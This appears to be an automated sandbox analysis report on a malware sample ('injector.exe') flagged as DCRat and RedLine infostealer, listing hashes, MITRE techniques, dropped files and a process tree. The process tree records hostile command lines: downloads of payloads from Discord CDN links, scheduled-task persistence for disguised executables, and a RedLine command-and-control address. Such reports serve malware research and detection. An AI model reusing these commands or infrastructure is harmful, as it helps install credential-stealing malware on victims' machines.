dcrat | 1e5acd9ae46d8522885ed418f362d0e4e5348b493ff8437d635e360c7f00aef1

Resubmissions

15-07-2021 13:15

210715-9sx48szksa 10

15-07-2021 13:15

210715-hdbmqll9yj 10

15-07-2021 11:47

210715-kkrgzfhz5a 10

Analysis

max time kernel
271s
max time network
721s
platform
windows10_x64
resource
win10v20210410
submitted
15-07-2021 13:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

injector.exe
Size

464KB
MD5

17cdde0e896e4a1bf5d8b376346c4d40
SHA1

6a1a5d06a351a23571d436c5f480fc6c0bf2267b
SHA256

33358691144fd04943b0de774643ba673448b6d7e616d482beb5200d09f9beeb
SHA512

43aa0de352de5930434951e6f79aa6f0175bc779858818aac0fc407e8dfcf4712df5d0bbea43953291b373ae2fec7ff5b4379f2bf16cf03fc2e3b2daec96c16c

Score

10^/10

dcrat redline @design_stalkar discovery infostealer rat spyware stealer upx

Malware Config

Extracted

Family

redline

Botnet

@design_stalkar

185.186.142.83:29867

Signatures

DCrat 2 IoCs

DarkCrystalrat.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\19680\cmd.exe	Dark_crystal_rat
C:\Users\Admin\AppData\Local\Temp\19680\cmd.exe	Dark_crystal_rat

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\19680\design_stalkar.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\19680\design_stalkar.exe	family_redline

DCRat Payload 6 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\19680\cmd.exe	dcrat
C:\Users\Admin\AppData\Local\Temp\19680\cmd.exe	dcrat
C:\SavesRefruntimemonitordll\SavesRefruntimemonitordllsavesnet.exe	dcrat
C:\SavesRefruntimemonitordll\SavesRefruntimemonitordllsavesnet.exe	dcrat
C:\odt\dwm.exe	dcrat
C:\odt\dwm.exe	dcrat

Downloads MZ/PE file
Executes dropped EXE 8 IoCs

Processes:

extd.exeextd.exeextd.exedesign_stalkar.execmd.exeextd.exeSavesRefruntimemonitordllsavesnet.exedwm.exe

pid process

1264 extd.exe
1880 extd.exe
204 extd.exe
2132 design_stalkar.exe
1320 cmd.exe
3060 extd.exe
2368 SavesRefruntimemonitordllsavesnet.exe
3872 dwm.exe

pid	process
1264	extd.exe
1880	extd.exe
204	extd.exe
2132	design_stalkar.exe
1320	cmd.exe
3060	extd.exe
2368	SavesRefruntimemonitordllsavesnet.exe
3872	dwm.exe

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1293.tmp\1294.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\1293.tmp\1294.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\1293.tmp\1294.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\1293.tmp\1294.tmp\extd.exe	upx
C:\Users\Admin\AppData\Local\Temp\1293.tmp\1294.tmp\extd.exe	upx

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 2 IoCs

Processes:

SavesRefruntimemonitordllsavesnet.exe

description	ioc	process
File created	C:\Program Files (x86)\Internet Explorer\images\WmiPrvSE.exe	SavesRefruntimemonitordllsavesnet.exe
File created	C:\Program Files (x86)\Internet Explorer\images\24dbde2999530ef5fd907494bc374d663924116c	SavesRefruntimemonitordllsavesnet.exe

Drops file in Windows directory 2 IoCs

Processes:

SavesRefruntimemonitordllsavesnet.exe

description	ioc	process
File created	C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\PPIVoiceAgents\SearchUI.exe	SavesRefruntimemonitordllsavesnet.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\PPIVoiceAgents\dab4d89cac03ec27dbe47b361df763dc3f848f6c	SavesRefruntimemonitordllsavesnet.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3804 schtasks.exe
180 schtasks.exe
812 schtasks.exe
2216 schtasks.exe
428 schtasks.exe
4052 schtasks.exe
Modifies registry class 1 IoCs

Processes:

cmd.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings cmd.exe
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

design_stalkar.exeSavesRefruntimemonitordllsavesnet.exedwm.exe

pid process

2132 design_stalkar.exe
2132 design_stalkar.exe
2368 SavesRefruntimemonitordllsavesnet.exe
3872 dwm.exe

pid	process
3804	schtasks.exe
180	schtasks.exe
812	schtasks.exe
2216	schtasks.exe
428	schtasks.exe
4052	schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	cmd.exe

pid	process
2132	design_stalkar.exe
2132	design_stalkar.exe
2368	SavesRefruntimemonitordllsavesnet.exe
3872	dwm.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

design_stalkar.exeSavesRefruntimemonitordllsavesnet.exedwm.exe

description	pid	process
Token: SeDebugPrivilege	2132	design_stalkar.exe
Token: SeDebugPrivilege	2368	SavesRefruntimemonitordllsavesnet.exe
Token: SeDebugPrivilege	3872	dwm.exe

Suspicious use of WriteProcessMemory 38 IoCs

Processes:

injector.execmd.execmd.exeWScript.execmd.exeSavesRefruntimemonitordllsavesnet.exe

description	pid	process	target process
PID 3992 wrote to memory of 3328	3992	injector.exe	cmd.exe
PID 3992 wrote to memory of 3328	3992	injector.exe	cmd.exe
PID 3328 wrote to memory of 1264	3328	cmd.exe	extd.exe
PID 3328 wrote to memory of 1264	3328	cmd.exe	extd.exe
PID 3328 wrote to memory of 1880	3328	cmd.exe	extd.exe
PID 3328 wrote to memory of 1880	3328	cmd.exe	extd.exe
PID 3328 wrote to memory of 204	3328	cmd.exe	extd.exe
PID 3328 wrote to memory of 204	3328	cmd.exe	extd.exe
PID 3328 wrote to memory of 2132	3328	cmd.exe	design_stalkar.exe
PID 3328 wrote to memory of 2132	3328	cmd.exe	design_stalkar.exe
PID 3328 wrote to memory of 2132	3328	cmd.exe	design_stalkar.exe
PID 3328 wrote to memory of 1320	3328	cmd.exe	cmd.exe
PID 3328 wrote to memory of 1320	3328	cmd.exe	cmd.exe
PID 3328 wrote to memory of 1320	3328	cmd.exe	cmd.exe
PID 3328 wrote to memory of 3060	3328	cmd.exe	extd.exe
PID 3328 wrote to memory of 3060	3328	cmd.exe	extd.exe
PID 1320 wrote to memory of 3564	1320	cmd.exe	WScript.exe
PID 1320 wrote to memory of 3564	1320	cmd.exe	WScript.exe
PID 1320 wrote to memory of 3564	1320	cmd.exe	WScript.exe
PID 3564 wrote to memory of 3576	3564	WScript.exe	cmd.exe
PID 3564 wrote to memory of 3576	3564	WScript.exe	cmd.exe
PID 3564 wrote to memory of 3576	3564	WScript.exe	cmd.exe
PID 3576 wrote to memory of 2368	3576	cmd.exe	SavesRefruntimemonitordllsavesnet.exe
PID 3576 wrote to memory of 2368	3576	cmd.exe	SavesRefruntimemonitordllsavesnet.exe
PID 2368 wrote to memory of 3804	2368	SavesRefruntimemonitordllsavesnet.exe	schtasks.exe
PID 2368 wrote to memory of 3804	2368	SavesRefruntimemonitordllsavesnet.exe	schtasks.exe
PID 2368 wrote to memory of 180	2368	SavesRefruntimemonitordllsavesnet.exe	schtasks.exe
PID 2368 wrote to memory of 180	2368	SavesRefruntimemonitordllsavesnet.exe	schtasks.exe
PID 2368 wrote to memory of 812	2368	SavesRefruntimemonitordllsavesnet.exe	schtasks.exe
PID 2368 wrote to memory of 812	2368	SavesRefruntimemonitordllsavesnet.exe	schtasks.exe
PID 2368 wrote to memory of 2216	2368	SavesRefruntimemonitordllsavesnet.exe	schtasks.exe
PID 2368 wrote to memory of 2216	2368	SavesRefruntimemonitordllsavesnet.exe	schtasks.exe
PID 2368 wrote to memory of 428	2368	SavesRefruntimemonitordllsavesnet.exe	schtasks.exe
PID 2368 wrote to memory of 428	2368	SavesRefruntimemonitordllsavesnet.exe	schtasks.exe
PID 2368 wrote to memory of 4052	2368	SavesRefruntimemonitordllsavesnet.exe	schtasks.exe
PID 2368 wrote to memory of 4052	2368	SavesRefruntimemonitordllsavesnet.exe	schtasks.exe
PID 2368 wrote to memory of 3872	2368	SavesRefruntimemonitordllsavesnet.exe	dwm.exe
PID 2368 wrote to memory of 3872	2368	SavesRefruntimemonitordllsavesnet.exe	dwm.exe

C:\Users\Admin\AppData\Local\Temp\injector.exe
"C:\Users\Admin\AppData\Local\Temp\injector.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3992

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1293.tmp\1294.tmp\1295.bat C:\Users\Admin\AppData\Local\Temp\injector.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:3328

C:\Users\Admin\AppData\Local\Temp\1293.tmp\1294.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\1293.tmp\1294.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:1264

C:\Users\Admin\AppData\Local\Temp\1293.tmp\1294.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\1293.tmp\1294.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/864812305207918637/864817376575225886/design_stalkar.exe" "design_stalkar.exe" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:1880

C:\Users\Admin\AppData\Local\Temp\1293.tmp\1294.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\1293.tmp\1294.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/864812305207918637/864813713935433748/cmd.exe" "cmd.exe" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:204

C:\Users\Admin\AppData\Local\Temp\19680\design_stalkar.exe
design_stalkar.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2132

C:\Users\Admin\AppData\Local\Temp\19680\cmd.exe
cmd.exe
3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1320

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\SavesRefruntimemonitordll\S07c5aZd4wYU.vbe"
4⤵
- Suspicious use of WriteProcessMemory
PID:3564

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\SavesRefruntimemonitordll\dbycS.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:3576

C:\SavesRefruntimemonitordll\SavesRefruntimemonitordllsavesnet.exe
"C:\SavesRefruntimemonitordll\SavesRefruntimemonitordllsavesnet.exe"
6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2368

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "dwm" /sc ONLOGON /tr "'C:\odt\dwm.exe'" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:3804

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "design_stalkar" /sc ONLOGON /tr "'C:\Documents and Settings\design_stalkar.exe'" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:180

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "SearchUI" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\PPIVoiceAgents\SearchUI.exe'" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:812

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "SearchUI" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SearchUI.exe'" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:2216

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\images\WmiPrvSE.exe'" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:428

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Default\Recent\OfficeClickToRun.exe'" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:4052

C:\odt\dwm.exe
"C:\odt\dwm.exe"
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3872

C:\Users\Admin\AppData\Local\Temp\1293.tmp\1294.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\1293.tmp\1294.tmp\extd.exe "" "" "" "" "" "" "" "" ""
3⤵
- Executes dropped EXE
PID:3060

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\SavesRefruntimemonitordll\S07c5aZd4wYU.vbe
MD5
391e34bc51be25c56bd85d81a6a84541

SHA1
68586d4f9f34f11ba3e1ad67756d65a7b9cd09ec

SHA256
1f6c5cb27c5ff6f215ca63c678caaf545db97a7e4b0f8f2cc4711f35a0d01c33

SHA512
982191ceb004cc98b3f756eb7ad7355c6eb9ba337b73b691c214ca99d326cd83e46bdc6e18c31020665efaf3a7ea8512c72599a87b636a4384c6a7ad8785f6bd

Download Submit
C:\SavesRefruntimemonitordll\SavesRefruntimemonitordllsavesnet.exe
MD5
96e7fbbe91a544face9f073d359eb4f6

SHA1
f148a329a3a8bb6bc97ccc01139a3651eef3d8bd

SHA256
3d8e8ce36a6a29298846a4216ea303db369b7bfc750fcfd1028b8432abc29483

SHA512
95448fe82c03652b3be42d4cc662c3e4760dd2ba62a8a79f45782385c5255d4f8938e1a1cbd867eeba666c948f915f8cdc9f20a44bc97d1fd03d77aa58755569

Download Submit
C:\SavesRefruntimemonitordll\SavesRefruntimemonitordllsavesnet.exe
MD5
96e7fbbe91a544face9f073d359eb4f6

SHA1
f148a329a3a8bb6bc97ccc01139a3651eef3d8bd

SHA256
3d8e8ce36a6a29298846a4216ea303db369b7bfc750fcfd1028b8432abc29483

SHA512
95448fe82c03652b3be42d4cc662c3e4760dd2ba62a8a79f45782385c5255d4f8938e1a1cbd867eeba666c948f915f8cdc9f20a44bc97d1fd03d77aa58755569

Download Submit
C:\SavesRefruntimemonitordll\dbycS.bat
MD5
0556afaaa8f698953a3b2acfbe7ea3c1

SHA1
4b5d16edd9512c017e582c8df4b76c22a6d7d0fe

SHA256
5bdbcdf457357f800aea7a36c6cf7a32c578bf77a7d7ba7ef34d5a2e19bd05ad

SHA512
54b5dff5f78e1c6b1758345111e0af2d85d9c6ea4ac98f7f1d215990fb881c38ef3beb9dd80d63fe06c2880a8e29179bfbde9aa79a406d6ab0e17cd119e6375a

Download Submit
C:\Users\Admin\AppData\Local\Temp\1293.tmp\1294.tmp\1295.bat
MD5
b17a90ee0f760c0e01d5a22ec9c0a15c

SHA1
087f38bbf66fa7431f8c677443d7f214de80e370

SHA256
f6ab32aca9b5ee1ad8d4cac31f2b7b280fbdb5f20b5112c4ab55fc93bab09dc2

SHA512
da6903e4b0e313f7b4317310f541c67096a9608e9b30b3fdab69184cf8e97b344de7308f692aa2420d90a33be34ba0ccda68a7fbf557543c9e1912db5a898025

Download Submit
C:\Users\Admin\AppData\Local\Temp\1293.tmp\1294.tmp\extd.exe
MD5
c14ce13ab09b4829f67a879d735a10a1

SHA1
537e1ce843f07ce629699ef5742c42ee2f06e9b6

SHA256
ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

SHA512
c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

Download Submit
C:\Users\Admin\AppData\Local\Temp\1293.tmp\1294.tmp\extd.exe
MD5
c14ce13ab09b4829f67a879d735a10a1

SHA1
537e1ce843f07ce629699ef5742c42ee2f06e9b6

SHA256
ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

SHA512
c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

Download Submit
C:\Users\Admin\AppData\Local\Temp\1293.tmp\1294.tmp\extd.exe
MD5
c14ce13ab09b4829f67a879d735a10a1

SHA1
537e1ce843f07ce629699ef5742c42ee2f06e9b6

SHA256
ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

SHA512
c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

Download Submit
C:\Users\Admin\AppData\Local\Temp\1293.tmp\1294.tmp\extd.exe
MD5
c14ce13ab09b4829f67a879d735a10a1

SHA1
537e1ce843f07ce629699ef5742c42ee2f06e9b6

SHA256
ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

SHA512
c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

Download Submit
C:\Users\Admin\AppData\Local\Temp\1293.tmp\1294.tmp\extd.exe
MD5
c14ce13ab09b4829f67a879d735a10a1

SHA1
537e1ce843f07ce629699ef5742c42ee2f06e9b6

SHA256
ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a

SHA512
c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38

Download Submit
C:\Users\Admin\AppData\Local\Temp\19680\cmd.exe
MD5
7a94c4162719970b494b9236f8d65031

SHA1
d65fdb0c0bad79bfa557f6128d84abd95a50657d

SHA256
4faf71df7f656a81c48f80506ad10747425dd037b669343d2d4d346e541ac706

SHA512
5b695809e6c30470a3522c9816437e2681d31a1e3b369df69102576a1b2db723106fe55df512fd312061dab05d11f5b6fa122b2b5f099fd377af717e61191618

Download Submit
C:\Users\Admin\AppData\Local\Temp\19680\cmd.exe
MD5
7a94c4162719970b494b9236f8d65031

SHA1
d65fdb0c0bad79bfa557f6128d84abd95a50657d

SHA256
4faf71df7f656a81c48f80506ad10747425dd037b669343d2d4d346e541ac706

SHA512
5b695809e6c30470a3522c9816437e2681d31a1e3b369df69102576a1b2db723106fe55df512fd312061dab05d11f5b6fa122b2b5f099fd377af717e61191618

Download Submit
C:\Users\Admin\AppData\Local\Temp\19680\design_stalkar.exe
MD5
231110ce6edfe6d91c5e9683f775f81d

SHA1
86da27eff0bcc428f286dda0886ae8ceb80b5cc0

SHA256
068dee55e799786f658fe565c4c4fddeb6e4bf8a9c11d469bf28f991e24d2b2d

SHA512
1dd5dc22f587c7941b337ac7f7e4bfcb6299aac1197550cd9d9791e1fd770a67da0765da53c8c40b83b35028609c56f0f5fb2e4c1a6647b7d7fd61392c0c1118

Download Submit
C:\Users\Admin\AppData\Local\Temp\19680\design_stalkar.exe
MD5
231110ce6edfe6d91c5e9683f775f81d

SHA1
86da27eff0bcc428f286dda0886ae8ceb80b5cc0

SHA256
068dee55e799786f658fe565c4c4fddeb6e4bf8a9c11d469bf28f991e24d2b2d

SHA512
1dd5dc22f587c7941b337ac7f7e4bfcb6299aac1197550cd9d9791e1fd770a67da0765da53c8c40b83b35028609c56f0f5fb2e4c1a6647b7d7fd61392c0c1118

Download Submit
C:\odt\dwm.exe
MD5
96e7fbbe91a544face9f073d359eb4f6

SHA1
f148a329a3a8bb6bc97ccc01139a3651eef3d8bd

SHA256
3d8e8ce36a6a29298846a4216ea303db369b7bfc750fcfd1028b8432abc29483

SHA512
95448fe82c03652b3be42d4cc662c3e4760dd2ba62a8a79f45782385c5255d4f8938e1a1cbd867eeba666c948f915f8cdc9f20a44bc97d1fd03d77aa58755569

Download Submit
C:\odt\dwm.exe
MD5
96e7fbbe91a544face9f073d359eb4f6

SHA1
f148a329a3a8bb6bc97ccc01139a3651eef3d8bd

SHA256
3d8e8ce36a6a29298846a4216ea303db369b7bfc750fcfd1028b8432abc29483

SHA512
95448fe82c03652b3be42d4cc662c3e4760dd2ba62a8a79f45782385c5255d4f8938e1a1cbd867eeba666c948f915f8cdc9f20a44bc97d1fd03d77aa58755569

Download Submit
memory/180-157-0x0000000000000000-mapping.dmp

Download
memory/204-121-0x0000000000000000-mapping.dmp

Download
memory/428-160-0x0000000000000000-mapping.dmp

Download
memory/812-158-0x0000000000000000-mapping.dmp

Download
memory/1264-116-0x0000000000000000-mapping.dmp

Download
memory/1320-126-0x0000000000000000-mapping.dmp

Download
memory/1880-119-0x0000000000000000-mapping.dmp

Download
memory/2132-141-0x00000000025B0000-0x00000000025C2000-memory.dmp

Filesize
72KB

Download
memory/2132-154-0x0000000007280000-0x0000000007281000-memory.dmp

Filesize
4KB

Download
memory/2132-142-0x0000000004EE0000-0x0000000004EE1000-memory.dmp

Filesize
4KB

Download
memory/2132-139-0x0000000004C90000-0x0000000004C91000-memory.dmp

Filesize
4KB

Download
memory/2132-123-0x0000000000000000-mapping.dmp

Download
memory/2132-132-0x00000000003B0000-0x00000000003B1000-memory.dmp

Filesize
4KB

Download
memory/2132-135-0x0000000005220000-0x0000000005221000-memory.dmp

Filesize
4KB

Download
memory/2132-137-0x0000000004C50000-0x0000000004C51000-memory.dmp

Filesize
4KB

Download
memory/2132-136-0x00000000026E0000-0x00000000026E1000-memory.dmp

Filesize
4KB

Download
memory/2132-150-0x0000000006150000-0x0000000006151000-memory.dmp

Filesize
4KB

Download
memory/2132-151-0x0000000006850000-0x0000000006851000-memory.dmp

Filesize
4KB

Download
memory/2132-152-0x0000000006320000-0x0000000006321000-memory.dmp

Filesize
4KB

Download
memory/2132-153-0x0000000006530000-0x0000000006531000-memory.dmp

Filesize
4KB

Download
memory/2216-159-0x0000000000000000-mapping.dmp

Download
memory/2368-155-0x000000001B520000-0x000000001B522000-memory.dmp

Filesize
8KB

Download
memory/2368-148-0x0000000000760000-0x0000000000761000-memory.dmp

Filesize
4KB

Download
memory/2368-145-0x0000000000000000-mapping.dmp

Download
memory/3060-130-0x0000000000000000-mapping.dmp

Download
memory/3328-114-0x0000000000000000-mapping.dmp

Download
memory/3564-138-0x0000000000000000-mapping.dmp

Download
memory/3576-144-0x0000000000000000-mapping.dmp

Download
memory/3804-156-0x0000000000000000-mapping.dmp

Download
memory/3872-162-0x0000000000000000-mapping.dmp

Download
memory/3872-167-0x000000001B410000-0x000000001B412000-memory.dmp

Filesize
8KB

Download
memory/4052-161-0x0000000000000000-mapping.dmp

Download